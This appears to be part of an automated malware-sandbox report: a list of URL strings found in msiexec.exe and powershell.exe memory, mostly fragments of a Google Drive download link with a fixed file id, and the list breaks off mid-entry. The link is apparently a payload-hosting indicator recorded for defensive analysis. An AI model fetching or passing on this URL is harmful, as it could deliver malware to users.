      Source: msiexec.exe, 00000008.00000003.2767526641.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318326115.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3237785223.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3295276947.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179890641.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2676459479.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573778561.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318360888.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965523357.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.2514289224.00000000059A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2514289224.00000000059A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2514289224.00000000059A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: msiexec.exe, 00000008.00000003.2757239384.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665544248.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=d
      Source: msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2895819803.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780341301.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2906716111.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2906685901.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2872951148.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2895772098.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2872921981.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2883989316.0000000007677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontez
      Source: msiexec.exe, 00000008.00000003.3179936341.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2872951148.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2872921981.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179984412.0000000007677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.go
      Source: msiexec.exe, 00000008.00000003.2619484326.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2953438343.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699591387.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2872921981.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2918962381.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3046262604.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3070631388.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2977040669.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000676014.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3105851980.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3353303555.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699646259.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3214968026.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3058991671.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3214929617.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3157221364.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179984412.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2953483621.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2977069377.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711317348.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3140414130.0000000007676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: msiexec.exe, 00000008.00000003.3203654773.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3203690711.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3214968026.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3214929617.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/8
      Source: msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128227400.0000000007676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/H
      Source: msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/KSSM
      Source: msiexec.exe, 00000008.00000003.3070442102.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3059027146.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3082616591.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3082576480.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3070631388.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3058991671.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/P
      Source: msiexec.exe, 00000008.00000003.2619520650.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2619484326.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/com
      Source: msiexec.exe, 00000008.00000002.3378923875.00000000075FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/dPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
      Source: msiexec.exe, 00000008.00000002.3378923875.00000000075FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/dPObravzs21-oBd3j7tpvHPbFxz4tt&export=download=
      Source: msiexec.exe, 00000008.00000002.3378923875.00000000075FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/dPObravzs21-oBd3j7tpvHPbFxz4tt&export=download_
      Source: msiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711317348.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/e
      Source: msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780341301.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/nt.youtube.com
      Source: msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965651967.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965683282.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989745617.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2977040669.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000676014.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2977069377.0000000007677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/p
      Source: msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3226483699.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757239384.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3226517878.0000000007677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r
      Source: msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780341301.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rancisco1
      Source: msiexec.exe, 00000008.00000003.2780341301.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.googl
      Source: msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780341301.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2872951148.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2872921981.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2883989316.0000000007677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&expoC
      Source: msiexec.exe, 00000008.00000002.3378923875.0000000007649000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687998730.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2733970242.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757239384.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699591387.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699646259.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711317348.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=do
      Source: msiexec.exe, 00000008.00000003.2883989316.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665544248.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836951990.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3105809188.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt
      Source: msiexec.exe, 00000008.00000002.3378923875.00000000075FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt3
      Source: msiexec.exe, 00000008.00000003.3116840171.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2744986584.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3116878506.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2733970242.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3105851980.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3105809188.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt3j7tpvHPbFxz4tt
      Source: msiexec.exe, 00000008.00000003.2734019365.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711361558.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.000000000764D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814424080.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767526641.000000000764D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.000000000764D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757289437.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803545338.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.000000000764C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4ttAo
      Source: msiexec.exe, 00000008.00000003.2734019365.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711361558.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.000000000764D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814424080.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.0000000007649000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767526641.000000000764D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2873005207.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.000000000764D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757289437.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803545338.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836951990.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.000000000764C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4ttH
      Source: msiexec.exe, 00000008.00000003.2734019365.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.000000000764D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.0000000007649000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2873005207.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757289437.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836951990.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.000000000764C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt_
      Source: msiexec.exe, 00000008.00000002.3378923875.00000000075FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tta
      Source: msiexec.exe, 00000008.00000003.2676392370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2619520650.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2630558630.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2653986406.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665575556.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2676459479.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2642907755.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687998730.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2642875929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2607772288.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2619484326.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699591387.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699646259.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711317348.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665544248.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4ttssionKeyBackward
      Source: msiexec.exe, 00000008.00000003.2734019365.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711361558.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.000000000764D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814424080.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767526641.000000000764D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2873005207.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.000000000764D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757289437.000000000764B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803545338.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836951990.000000000764C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.000000000764C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tttUn
      Source: msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3191014204.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179936341.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2653986406.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665575556.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2642907755.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2895819803.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2642875929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2906716111.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2906685901.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2895772098.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3190978777.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2918962381.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179984412.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2930939009.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665544248.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2930909039.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/x
      Source: msiexec.exe, 00000008.00000003.3070442102.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093480353.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3059027146.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965651967.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3035039238.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3046207658.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965683282.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3116840171.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3082616591.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168346621.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3082576480.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3116878506.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3140381354.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093433677.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128227400.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3023170701.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3012198681.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/~o
      Source: msiexec.exe, 00000008.00000003.2803545338.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 00000008.00000003.2676392370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3070442102.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767470543.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093480353.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3059027146.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3191014204.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965651967.0000000007671000.00000004.00000020.00020000.00000000.sdmp, 